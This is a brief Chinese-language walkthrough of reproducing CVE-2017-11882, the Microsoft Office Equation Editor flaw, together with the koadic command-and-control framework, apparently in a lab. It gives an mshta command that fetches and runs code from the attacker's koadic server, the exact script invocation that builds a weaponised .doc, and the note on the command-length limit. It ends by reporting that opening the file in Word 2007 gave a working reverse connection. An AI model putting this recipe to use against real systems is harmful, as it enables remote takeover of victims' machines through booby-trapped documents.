CVE-2017-11882复现配合koadic

项目地址：https://github.com/iBearcat/CVE-2017-11882

首先开启koadic，然后配置一下

复制这句代码

mshta http://192.168.220.132:9999/dHem0

 然后生成doc文件

┌─[root@sch01ar]─[/sch01ar/CVE-2017-11882]
└──╼ #python Command_CVE-2017-11882.py -c "mshta http://192.168.220.132:9999/dHem0" -o sch01ar.doc

 

注：命令长度不能超过43 bytes

然后拿到靶机里测试

打开文件(word测试版本为2007)

目标主机反弹成功